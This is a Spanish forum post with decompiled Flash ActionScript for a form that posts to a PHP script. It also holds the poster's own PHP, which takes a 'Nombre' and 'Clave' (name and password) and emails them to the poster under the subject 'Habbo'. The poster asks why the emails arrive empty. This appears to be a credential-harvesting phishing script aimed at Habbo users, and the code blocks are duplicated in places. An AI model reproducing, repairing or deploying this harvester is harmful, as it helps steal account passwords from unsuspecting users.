Esto es el codigo del Flash
Cita:
Yo intente con un PHP con este codigo:// Action script...
// [Action in Frame 171]
function enviar()
{
* *trace (t_nombre.text);
* *datos_email.nombre = t_nombre.text;
* *datos_email.email = t_email.text;
* *datos_email.texto = t_texto.htmlText;
* *datos_email.estado = "";
* *datos_email.onLoad = function ()
* *{
* * * *trace (this);
* * * *trace (this.estado);
* * * *if (this.estado == "enviado")
* * * *{
* * * * * *gotoAndStop(222);
* * * *}
* * * *else
* * * *{
* * * * * *gotoAndStop(223);
* * * *} // end else if
* *};
* *datos_email.sendAndLoad("enviar_email.php", datos_email, "post");
* *gotoAndStop(221);
} // End of the function
System.useCodepage = false;
if (datos_email == null)
{
* *datos_email = new LoadVars();
* *datos_email.nombre = "";
* *datos_email.email = "";
* *datos_email.texto = "";
* *datos_email.estado = "";
} // end if
t_nombre.text = datos_email.nombre;
t_email.text = datos_email.email;
t_texto.htmlText = datos_email.texto;
this.b_enviar.onPress = enviar;
stop ();
stop ();
// [Action in Frame 220]
stop ();
// [Action in Frame 222]
this.b_enviar.onPress = function ()
{
* *gotoAndStop(1);
};
stop ();
// [Action in Frame 223]
this.b_enviar.onPress = function ()
{
* *gotoAndStop(1);
};
stop ();
// [Action in Frame 171]
function enviar()
{
* *trace (t_nombre.text);
* *datos_email.nombre = t_nombre.text;
* *datos_email.email = t_email.text;
* *datos_email.texto = t_texto.htmlText;
* *datos_email.estado = "";
* *datos_email.onLoad = function ()
* *{
* * * *trace (this);
* * * *trace (this.estado);
* * * *if (this.estado == "enviado")
* * * *{
* * * * * *gotoAndStop(222);
* * * *}
* * * *else
* * * *{
* * * * * *gotoAndStop(223);
* * * *} // end else if
* *};
* *datos_email.sendAndLoad("enviar_email.php", datos_email, "post");
* *gotoAndStop(221);
} // End of the function
System.useCodepage = false;
if (datos_email == null)
{
* *datos_email = new LoadVars();
* *datos_email.nombre = "";
* *datos_email.email = "";
* *datos_email.texto = "";
* *datos_email.estado = "";
} // end if
t_nombre.text = datos_email.nombre;
t_email.text = datos_email.email;
t_texto.htmlText = datos_email.texto;
this.b_enviar.onPress = enviar;
stop ();
stop ();
// [Action in Frame 220]
stop ();
// [Action in Frame 222]
this.b_enviar.onPress = function ()
{
* *gotoAndStop(1);
};
stop ();
// [Action in Frame 223]
this.b_enviar.onPress = function ()
{
* *gotoAndStop(1);
};
stop ();
Cita:
Me llegaba un email pero estaba en blanco. (ponia Nombre: Clave: ) <?
$content .= "
Nombre: " . $_POST['Nombre'] . " ";
$content .= "
Clave: " . $_POST['Clave'] . " ";
mail("MIEMAIL","Habbo",$content);
include ("reload.php");
?>
$content .= "
Nombre: " . $_POST['Nombre'] . " ";
$content .= "
Clave: " . $_POST['Clave'] . " ";
mail("MIEMAIL","Habbo",$content);
include ("reload.php");
?>